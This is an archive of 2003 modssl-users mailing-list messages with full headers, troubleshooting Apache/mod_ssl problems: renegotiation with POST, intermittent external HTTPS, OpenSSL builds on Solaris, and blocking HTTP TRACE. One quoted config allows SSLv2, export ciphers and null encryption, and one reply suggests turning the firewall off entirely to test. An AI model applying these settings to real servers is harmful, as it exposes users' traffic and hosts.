X-List-Name: modssl-users

Hi,=20

I'm currently trying to resolve the same problem, so if any of you have
a solution, don't hesitate to POST it here ;o)

-------------------------------------------
Pascal Rodrigue
Analyste de l'informatique
Division de l'exploitation
Service de l'informatique et des t=E9l=E9communications
Pavillon Louis-Jacques-Casault, local 2410
Universit=E9 Laval, Qu=E9bec, Canada,  G1K 7P4
Pascal.Rodrigue@sit.ulaval.ca
=20
"La vie n'est pas que la somme des obstacle que l'on rencontre =E0 =
chaque
jour. La vie, la vraie, c'est la mani=E8re dont on les franchit!"
=20
Das Leben ist nicht nur die Summe des Hindernisses, da=DF man an jedem =
Tag
begegnet. Das Leben, das wahre, ist es die Art, von der man sie
=FCberquert!=20

-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org] On Behalf Of Torvald Baade
Bringsvor
Sent: 13 juin, 2003 04:24
To: 'modssl-users@modssl.org'
Subject: Problems with POSTing


Hello.

Have run into a strange problem with Apache/mod_ssl 2.0.43:

I have set up a url that requires client certificates. And GET
operations on
this URL works very well indeed. But POST doesnt work:

[Thu Jun 12 11:06:27 2003] [error] SSL Re-negotiation in conjunction
with
POST method not supported!
hint: try SSLOptions +OptRenegotiate

I have tried +OptRenegotiate all over, but it doesnt make a difference.

Googling a bit reveals that this used to be a problem, but it seemes to
be
uncertain if it still is (in newer versions).

Have any of you run into this one?

Regards
Torvald
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 13 20:32:51 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 3FA05A895E; Fri, 13 Jun 2003 20:32:51 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from orngca-mls02.socal.rr.com (orngca-mls02.socal.rr.com [66.75.160.17])
	by master.modssl.org (Postfix) with ESMTP id 37D33A8936
	for ; Fri, 13 Jun 2003 20:32:49 +0200 (CEST)
Received: from FEYNMAN (cpe-66-27-149-71.socal.rr.com [66.27.149.71])
	by orngca-mls02.socal.rr.com (8.11.4/8.11.3) with SMTP id h5DITNk15136
	for ; Fri, 13 Jun 2003 11:29:23 -0700 (PDT)
Message-ID: <00fd01c331da$0241e3d0$1602a8c0@FEYNMAN>
From: "Konn Danley" 
To: 
Subject: https access problems
Date: Fri, 13 Jun 2003 11:31:29 -0700
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2720.3000
X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Konn Danley" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,

I am new to this mailing list.  I am having a problem with external internet
access to my server.  I have the following in place:

Red Hat 7.3/2.4.18-3
Apache 1.3.27
mod_ssl 2.8.12-1.3.27
OpenSSL 0.9.7a

I have a main server running on port 80, and a virtualhost on port 443 for
the SSL.  I can access port 443 100% of the time from any client on my
internal network.  From external networks, I am having problems connecting.
I see nothing in IPTraf when these connections external connections don't
connect, nor do I get anything in my log files.  I have no problems at all
with http.  All internal clients work fine for both http and https on MSIE,
Netscape, and Mozilla.  These same clients configured for loopback through a
dial-up and back into a cable-modem can't get in.....most of the time, but
once in a while.  The same symptoms occur for other people who have tried to
access my SSL website.  They have no problems with http, but https will
almost always refuse the connection or give them a page not displayed.

I found a couple of messages posted on this board which talked about the
SSLSessionCache.  I tried changing that to 'none' from 'dbm'.  When I did
this, the external connections worked!!  5 minutes later, they were gone,
and I was back to the same place that I started.  This is a very strange
problem, and I am NOT an expert.

I see that there are a lot of posts on this board concerning similiar
sounding problems.  Has anybody come up with a fix for this?  Does anybody
have any suggestions as to what I should do or try next?

Any help here is greatly appreciated.

Konn


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun 16 10:35:37 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id C5E96A8941; Mon, 16 Jun 2003 10:35:37 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from maggotts.rnib.org.uk (maggotts.rnib.org.uk [194.128.16.48])
	by master.modssl.org (Postfix) with ESMTP id 82989A8933
	for ; Mon, 16 Jun 2003 10:35:36 +0200 (CEST)
Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.17])
	by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id h5G8Z5521750
	for ; Mon, 16 Jun 2003 09:35:25 +0100
Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2656.59)
	id ; Mon, 16 Jun 2003 09:34:59 +0100
Message-ID: <9B66BBD37D5DD411B8CE00508B69700F033F2B62@pborolocal.rnib.org.uk>
From: John.Airey@rnib.org.uk
To: modssl-users@modssl.org
Subject: RE: https access problems
Date: Mon, 16 Jun 2003 09:34:58 +0100
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2656.59)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John.Airey@rnib.org.uk
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Do you have the ipchains or iptables firewall enabled? Try "service ipchains
stop" and "service iptables stop" to disable it completely and then try
again. In the former case "lokkit" will allow you to configure your firewall
to accept connections on the relevant ports.

- 
John Airey, BSc (Jt Hons), CNA, RHCE
Internet systems support officer, ITCSD, Royal National Institute of the
Blind,
Bakewell Road, Peterborough PE2 6XU,
Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk 

Evolution isn't true just because the majority of people think it is.

> -----Original Message-----
> From: Konn Danley [mailto:rovingdanley@socal.rr.com]
> Sent: 13 June 2003 19:31
> To: modssl-users@modssl.org
> Subject: https access problems
> 
> 
> Hi,
> 
> I am new to this mailing list.  I am having a problem with 
> external internet
> access to my server.  I have the following in place:
> 
> Red Hat 7.3/2.4.18-3
> Apache 1.3.27
> mod_ssl 2.8.12-1.3.27
> OpenSSL 0.9.7a
> 
> I have a main server running on port 80, and a virtualhost on 
> port 443 for
> the SSL.  I can access port 443 100% of the time from any client on my
> internal network.  From external networks, I am having 
> problems connecting.
> I see nothing in IPTraf when these connections external 
> connections don't
> connect, nor do I get anything in my log files.  I have no 
> problems at all
> with http.  All internal clients work fine for both http and 
> https on MSIE,
> Netscape, and Mozilla.  These same clients configured for 
> loopback through a
> dial-up and back into a cable-modem can't get in.....most of 
> the time, but
> once in a while.  The same symptoms occur for other people 
> who have tried to
> access my SSL website.  They have no problems with http, but 
> https will
> almost always refuse the connection or give them a page not displayed.
> 
> I found a couple of messages posted on this board which 
> talked about the
> SSLSessionCache.  I tried changing that to 'none' from 'dbm'. 
>  When I did
> this, the external connections worked!!  5 minutes later, 
> they were gone,
> and I was back to the same place that I started.  This is a 
> very strange
> problem, and I am NOT an expert.
> 
> I see that there are a lot of posts on this board concerning similiar
> sounding problems.  Has anybody come up with a fix for this?  
> Does anybody
> have any suggestions as to what I should do or try next?
> 
> Any help here is greatly appreciated.
> 
> Konn
> 
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

- 

NOTICE: The information contained in this email and any attachments is 
confidential and may be legally privileged. If you are not the 
intended recipient you are hereby notified that you must not use, 
disclose, distribute, copy, print or rely on this email's content. If 
you are not the intended recipient, please notify the sender 
immediately and then delete the email and any attachments from your 
system.

RNIB has made strenuous efforts to ensure that emails and any 
attachments generated by its staff are free from viruses. However, it 
cannot accept any responsibility for any viruses which are 
transmitted. We therefore recommend you scan all attachments.

Please note that the statements and views expressed in this email 
and any attachments are those of the author and do not necessarily 
represent those of RNIB.

RNIB Registered Charity Number: 226227

Website: http://www.rnib.org.uk 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun 16 18:03:01 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 000A4A8941; Mon, 16 Jun 2003 18:03:00 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from orngca-mls02.socal.rr.com (orngca-mls02.socal.rr.com [66.75.160.17])
	by master.modssl.org (Postfix) with ESMTP id E77DDA8933
	for ; Mon, 16 Jun 2003 18:02:58 +0200 (CEST)
Received: from FEYNMAN (cpe-66-27-149-71.socal.rr.com [66.27.149.71])
	by orngca-mls02.socal.rr.com (8.11.4/8.11.3) with SMTP id h5GFxVk09900
	for ; Mon, 16 Jun 2003 08:59:31 -0700 (PDT)
Message-ID: <017c01c33420$8458b630$1602a8c0@FEYNMAN>
From: "Konn Danley" 
To: 
References: <9B66BBD37D5DD411B8CE00508B69700F033F2B62@pborolocal.rnib.org.uk>
Subject: Re: https access problems
Date: Mon, 16 Jun 2003 09:01:09 -0700
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2720.3000
X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Konn Danley" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi John,

Thanks for the response.

The thing is, I can get in once in a while (1 in 100 times).  When I first
encountered the problem, I thought it was a firewalling problem.  I use both
TCP wrappers and iptables.  I had disabled both without any change in the
problem.  The fact that I can get in once in a while leads me to think that
it is not a firewalling problem.  I can get in with the machines on my
internal network 100% of the time.  I have never had a problem with http on
either internal or external.  It is https only.  I did try what you
suggested with no change in the problem, and I did do this before on several
occasions.

I have a wireless access point which acts as my gateway.  I am wondering if
there is a problem with NAT?

The strange thing is that when I changed the SSLSessionCache from 'dbm' to
'none' (I don't think my platform supports shm), I was able to get in with
external access 100% of the time.  I thought my problem was fixed, but 5
minutes later, the connections could not get in.

Since I sent the last mail, I now have all of the latest software, mod_ssl
2.8.14, OpenSSL 0.9.7b. and I still have the same problem.

Konn


----- Original Message -----
From: 
To: 
Sent: Monday, June 16, 2003 1:34 AM
Subject: RE: https access problems


> Do you have the ipchains or iptables firewall enabled? Try "service
ipchains
> stop" and "service iptables stop" to disable it completely and then try
> again. In the former case "lokkit" will allow you to configure your
firewall
> to accept connections on the relevant ports.
>
> -
> John Airey, BSc (Jt Hons), CNA, RHCE
> Internet systems support officer, ITCSD, Royal National Institute of the
> Blind,
> Bakewell Road, Peterborough PE2 6XU,
> Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk
>
> Evolution isn't true just because the majority of people think it is.
>
> > -----Original Message-----
> > From: Konn Danley [mailto:rovingdanley@socal.rr.com]
> > Sent: 13 June 2003 19:31
> > To: modssl-users@modssl.org
> > Subject: https access problems
> >
> >
> > Hi,
> >
> > I am new to this mailing list.  I am having a problem with
> > external internet
> > access to my server.  I have the following in place:
> >
> > Red Hat 7.3/2.4.18-3
> > Apache 1.3.27
> > mod_ssl 2.8.12-1.3.27
> > OpenSSL 0.9.7a
> >
> > I have a main server running on port 80, and a virtualhost on
> > port 443 for
> > the SSL.  I can access port 443 100% of the time from any client on my
> > internal network.  From external networks, I am having
> > problems connecting.
> > I see nothing in IPTraf when these connections external
> > connections don't
> > connect, nor do I get anything in my log files.  I have no
> > problems at all
> > with http.  All internal clients work fine for both http and
> > https on MSIE,
> > Netscape, and Mozilla.  These same clients configured for
> > loopback through a
> > dial-up and back into a cable-modem can't get in.....most of
> > the time, but
> > once in a while.  The same symptoms occur for other people
> > who have tried to
> > access my SSL website.  They have no problems with http, but
> > https will
> > almost always refuse the connection or give them a page not displayed.
> >
> > I found a couple of messages posted on this board which
> > talked about the
> > SSLSessionCache.  I tried changing that to 'none' from 'dbm'.
> >  When I did
> > this, the external connections worked!!  5 minutes later,
> > they were gone,
> > and I was back to the same place that I started.  This is a
> > very strange
> > problem, and I am NOT an expert.
> >
> > I see that there are a lot of posts on this board concerning similiar
> > sounding problems.  Has anybody come up with a fix for this?
> > Does anybody
> > have any suggestions as to what I should do or try next?
> >
> > Any help here is greatly appreciated.
> >
> > Konn
> >
> >
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
> >
>
> -
>
> NOTICE: The information contained in this email and any attachments is
> confidential and may be legally privileged. If you are not the
> intended recipient you are hereby notified that you must not use,
> disclose, distribute, copy, print or rely on this email's content. If
> you are not the intended recipient, please notify the sender
> immediately and then delete the email and any attachments from your
> system.
>
> RNIB has made strenuous efforts to ensure that emails and any
> attachments generated by its staff are free from viruses. However, it
> cannot accept any responsibility for any viruses which are
> transmitted. We therefore recommend you scan all attachments.
>
> Please note that the statements and views expressed in this email
> and any attachments are those of the author and do not necessarily
> represent those of RNIB.
>
> RNIB Registered Charity Number: 226227
>
> Website: http://www.rnib.org.uk
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 18 04:06:31 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 34239A8944; Wed, 18 Jun 2003 04:06:31 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from deepthought.cs.virginia.edu (deepthought.cs.Virginia.EDU [128.143.69.223])
	by master.modssl.org (Postfix) with ESMTP id BFC14A8933
	for ; Wed, 18 Jun 2003 04:06:29 +0200 (CEST)
Received: from localhost (root@localhost)
	by deepthought.cs.virginia.edu (8.12.9/8.11.4) with ESMTP id h5I25xwS003620;
	Tue, 17 Jun 2003 22:06:00 -0400
Date: Tue, 17 Jun 2003 22:05:59 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@deepthought.cs.virginia.edu
To: Percy Rotteveel 
Cc: modssl-users@modssl.org
Subject: Re: building shared libraries with OpenSSL
In-Reply-To: 
Message-ID: 
References: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Tue, 17 Jun 2003, Percy Rotteveel wrote:

> I've read your article regarding: "building shared libraries with OpenSSL"
> (http://www.mail-archive.com/modssl-users@modssl.org/msg15745.html). The
> instructions are very clear and very helpful. When I execute "make
> build-shared", I get the following error message:
>
> ld: fatal: relocations remain against allocatable but non-writable sections
> collect2: ld returned 1 exit status
> *** Error code 1
> make: Fatal error: Command failed for target `do_solaris-shared'
>
> Do you have any clue what is wrong and how to solve it?
>
> In advance, thank you so much!
>
> With kind regards,
> Percy


I've had somebody else running Solaris report the same thing to me.
Unfortunately I've not had any experience building OpenSSL on Solaris...
I've only done it on Linux.  Maybe somebody else on the modssl-users list
has, so I'm cc:ing this to the list...

--Cliff
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 18 17:07:57 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 7B2E8A8944; Wed, 18 Jun 2003 17:07:57 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from maggotts.rnib.org.uk (maggotts.rnib.org.uk [194.128.16.48])
	by master.modssl.org (Postfix) with ESMTP id 37737A8933
	for ; Wed, 18 Jun 2003 17:07:56 +0200 (CEST)
Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.17])
	by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id h5IF7O511294
	for ; Wed, 18 Jun 2003 16:07:44 +0100
Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2656.59)
	id ; Wed, 18 Jun 2003 16:07:18 +0100
Message-ID: <9B66BBD37D5DD411B8CE00508B69700F033F2BAE@pborolocal.rnib.org.uk>
From: John.Airey@rnib.org.uk
To: modssl-users@modssl.org
Subject: RE: https access problems
Date: Wed, 18 Jun 2003 16:07:17 +0100
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2656.59)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John.Airey@rnib.org.uk
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I've just double-checked and the Red Hat 7.3 RPM packages (apache-1.3.27-2
and mod_ssl-2.8.12-2) use dbm instead of the shm caching that was in 7.2:

SSLSessionCache         dbm:logs/ssl_scache
SSLSessionCacheTimeout  300

I hope this hasn't sent you off the wrong way...

- 
John Airey, BSc (Jt Hons), CNA, RHCE
Internet systems support officer, ITCSD, Royal National Institute of the
Blind,
Bakewell Road, Peterborough PE2 6XU,
Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk 

Evolution isn't true just because the majority of people think it is.

> -----Original Message-----
> From: Konn Danley [mailto:rovingdanley@socal.rr.com]
> Sent: 16 June 2003 17:01
> To: modssl-users@modssl.org
> Subject: Re: https access problems
> 
> 
> Hi John,
> 
> Thanks for the response.
> 
> The thing is, I can get in once in a while (1 in 100 times).  
> When I first
> encountered the problem, I thought it was a firewalling 
> problem.  I use both
> TCP wrappers and iptables.  I had disabled both without any 
> change in the
> problem.  The fact that I can get in once in a while leads me 
> to think that
> it is not a firewalling problem.  I can get in with the machines on my
> internal network 100% of the time.  I have never had a 
> problem with http on
> either internal or external.  It is https only.  I did try what you
> suggested with no change in the problem, and I did do this 
> before on several
> occasions.
> 
> I have a wireless access point which acts as my gateway.  I 
> am wondering if
> there is a problem with NAT?
> 
> The strange thing is that when I changed the SSLSessionCache 
> from 'dbm' to
> 'none' (I don't think my platform supports shm), I was able 
> to get in with
> external access 100% of the time.  I thought my problem was 
> fixed, but 5
> minutes later, the connections could not get in.
> 
> Since I sent the last mail, I now have all of the latest 
> software, mod_ssl
> 2.8.14, OpenSSL 0.9.7b. and I still have the same problem.
> 
> Konn
> 
> 
> 

- 

NOTICE: The information contained in this email and any attachments is 
confidential and may be legally privileged. If you are not the 
intended recipient you are hereby notified that you must not use, 
disclose, distribute, copy, print or rely on this email's content. If 
you are not the intended recipient, please notify the sender 
immediately and then delete the email and any attachments from your 
system.

RNIB has made strenuous efforts to ensure that emails and any 
attachments generated by its staff are free from viruses. However, it 
cannot accept any responsibility for any viruses which are 
transmitted. We therefore recommend you scan all attachments.

Please note that the statements and views expressed in this email 
and any attachments are those of the author and do not necessarily 
represent those of RNIB.

RNIB Registered Charity Number: 226227

Website: http://www.rnib.org.uk 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 18 18:26:26 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 48D26A8944; Wed, 18 Jun 2003 18:26:26 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from hemi.math.gatech.edu (hemi.math.gatech.edu [130.207.146.192])
	by master.modssl.org (Postfix) with ESMTP id C2ACBA8933
	for ; Wed, 18 Jun 2003 18:26:24 +0200 (CEST)
Received: from hemi.math.gatech.edu (localhost [127.0.0.1])
	by hemi.math.gatech.edu (Postfix) with ESMTP
	id D0FDAB45C5; Wed, 18 Jun 2003 12:26:22 -0400 (EDT)
Received: (from villegas@localhost)
	by hemi.math.gatech.edu (8.12.9/8.12.9/Submit) id h5IGQLUw031021;
	Wed, 18 Jun 2003 12:26:21 -0400
Date: Wed, 18 Jun 2003 12:26:21 -0400
From: Carlos Villegas 
To: modssl-users@modssl.org
Cc: Percy Rotteveel 
Subject: Re: building shared libraries with OpenSSL
Message-ID: <20030618162621.GF3670@hemi.math.gatech.edu>
References:  
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: 
User-Agent: Mutt/1.4.1i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Carlos Villegas 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


We moved to apache 2 several months ago, but this looks familiar. Looking 
through some old notes I found that I used the following options to configure
(for apache 1.3.27):

 --enable-module=most \
        --enable-shared=max \
        --enable-module=so \
        --enable-module=ssl \
        --enable-rule=SHARED_CORE 

I remember that the last of those args made it possible to compile it. Hope
it helps.

Carlos

On Tue, Jun 17, 2003 at 10:05:59PM -0400, Cliff Woolley wrote:
> On Tue, 17 Jun 2003, Percy Rotteveel wrote:
> 
> > I've read your article regarding: "building shared libraries with OpenSSL"
> > (http://www.mail-archive.com/modssl-users@modssl.org/msg15745.html). The
> > instructions are very clear and very helpful. When I execute "make
> > build-shared", I get the following error message:
> >
> > ld: fatal: relocations remain against allocatable but non-writable sections
> > collect2: ld returned 1 exit status
> > *** Error code 1
> > make: Fatal error: Command failed for target `do_solaris-shared'
> >
> > Do you have any clue what is wrong and how to solve it?
> >
> > In advance, thank you so much!
> >
> > With kind regards,
> > Percy
> 
> 
> I've had somebody else running Solaris report the same thing to me.
> Unfortunately I've not had any experience building OpenSSL on Solaris...
> I've only done it on Linux.  Maybe somebody else on the modssl-users list
> has, so I'm cc:ing this to the list...
> 
> --Cliff
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 18 21:03:36 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id B36D6A8944; Wed, 18 Jun 2003 21:03:36 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web41507.mail.yahoo.com (web41507.mail.yahoo.com [66.218.93.90])
	by master.modssl.org (Postfix) with SMTP id D7848A8933
	for ; Wed, 18 Jun 2003 21:03:34 +0200 (CEST)
Message-ID: <20030618190327.19788.qmail@web41507.mail.yahoo.com>
Received: from [130.86.71.139] by web41507.mail.yahoo.com via HTTP; Wed, 18 Jun 2003 12:03:27 PDT
Date: Wed, 18 Jun 2003 12:03:27 -0700 (PDT)
From: kulkarni veena 
Subject: https not working
To: modssl-users@modssl.org
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: kulkarni veena 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,
 I have been stuck with the problem for a long time
now. I will appreciate any suugestions to rectify this
problem.

THe thing is my https server on SunOS 5.9 serves
Netscape ok. It is only MSIE thatis not able to access
secure pages. 

what I see on the ssl_error_log is that IE and Apache
server decide on the protocol and then server
shutsdown the connection. What could be the reason?
I'm totally lost.

Part of the ssl_error_log file:
-------------------------------
[Tue Jun 17 14:16:30 2003] [debug]
ssl_engine_kernel.c(1761): OpenSSL: Handshake: done
[Tue Jun 17 14:16:30 2003] [info] Connection: Client
IP: 130.86.72.20, Protocol: SSLv2, Cipher: RC4-MD5
(128/128 bits)
[Tue Jun 17 14:16:31 2003] [debug]
ssl_engine_io.c(1489): OpenSSL: I/O error, 2 bytes
expected to read on BIO#13c2d0 [mem: 17b978]
[Tue Jun 17 14:16:31 2003] [info] (70014)End of file
found: SSL input filter read failed.
[Tue Jun 17 14:16:31 2003] [info] Connection to child
3 closed with standard shutdown(server
hawk.ecs.csus.edu:443, client 130.86.72.20)
~

-----
Config:

OS: SunOs 5.9
Apache: 2.0.45
openssl: 0.9.7a
shared library: MM

-----
Thanks in advance. 

--veena

__________________________________
Do you Yahoo!?
SBC Yahoo! DSL - Now only $29.95 per month!
http://sbc.yahoo.com
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 19 01:50:11 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 4C3A4A8964; Thu, 19 Jun 2003 01:50:11 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from swan.mail.pas.earthlink.net (swan.mail.pas.earthlink.net [207.217.120.123])
	by master.modssl.org (Postfix) with ESMTP id A415CA8936
	for ; Thu, 19 Jun 2003 01:50:05 +0200 (CEST)
Received: from dewey.psp.pas.earthlink.net ([207.217.78.219])
	by swan.mail.pas.earthlink.net with esmtp (Exim 3.33 #1)
	id 19Smgl-0005Ay-00
	for modssl-users@modssl.org; Wed, 18 Jun 2003 16:50:03 -0700
Received: from [207.217.78.15] by EarthlinkWAM via HTTP; Wed Jun 18 16:50:00 PDT 2003
Message-ID: <7672666.1055980202847.JavaMail.nobody@dewey.psp.pas.earthlink.net>
Date: Wed, 18 Jun 2003 16:50:01 -0700 (PDT)
From: rmck 
To: modssl-users@modssl.org
Subject: Virtual Host question?
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-Mailer: Earthlink Web Access Mail version 3.0
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rmck 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello,

I have an apache1.3.27/mod_ssl2.8.12. I was told today I needed to fix this issue with my web server "HTTP TRACE Enabled". 

Now I have module mod_rewrite as a Loaded Module. The fix for this is as follows:

If you are using Apache, add the following lines for each virtual
host in your configuration file :
    RewriteEngine on
    RewriteCond %{REQUEST_METHOD} ^TRACE
    RewriteRule .* - [F]

I'm confused about where to place this in my httpd.conf? 

I have two virtual hosts in my httpd.conf file. Does this look correct, thanks alot for your help:



Redirect / https://host.company.com/
Servername host.company.com
RewriteEngine On
RewriteCond %{REQUEST_METHOD} ^TRACE
RewriteRule .* - [F]




 
#  General setup for the virtual host
DocumentRoot "/opt/apache/htdocs"
ServerName host.company.com
ServerAdmin user@company.com
ErrorLog /opt/apache/logs/error_log
TransferLog /opt/apache/logs/access_log
RewriteEngine On
RewriteCond %{REQUEST_METHOD} ^TRACE
RewriteRule .* - [F]

#   SSL Engine Switch:
#   Enable/Disable SSL for this virtual host.
SSLEngine on
#   SSL Cipher Suite:
#   List the ciphers that the client is permitted to negotiate.
#   See the mod_ssl documentation for a complete list.
SSLCipherSuite ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL
/
#     this only for browsers where you know that their SSL implementation
#     works correctly.
#   Notice: Most problems of broken clients are also related to the HTTP
#   keep-alive facility, so you usually additionally want to disable
#   keep-alive for those clients, too. Use variable "nokeepalive" for this.
#   Similarly, one has to force some clients to use HTTP/1.0 to workaround
#   their broken HTTP/1.1 implementation. Use variables "downgrade-1.0" and
#   "force-response-1.0" for this.
SetEnvIf User-Agent ".*MSIE.*" \
         nokeepalive ssl-unclean-shutdown \
         downgrade-1.0 force-response-1.0
 
#   Per-Server Logging:
#   The home of a custom SSL log file. Use this when you want a
#   compact non-error SSL logfile on a virtual host basis.
CustomLog /opt/apache/logs/ssl_request_log \
          "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"
 




Regards,
Rob

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

